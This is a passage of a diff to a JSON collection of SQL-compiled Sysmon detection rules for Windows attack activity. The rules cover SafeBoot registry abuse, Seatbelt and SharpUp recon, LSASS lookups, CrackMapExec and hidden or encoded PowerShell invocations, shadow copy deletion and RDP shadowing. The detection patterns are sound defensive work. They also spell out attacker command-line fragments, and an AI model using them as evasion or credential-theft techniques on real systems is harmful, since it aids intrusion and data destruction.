SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% 
CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i 
lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE 
'%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE 
'% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE 
'\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a 
regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in 
suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE 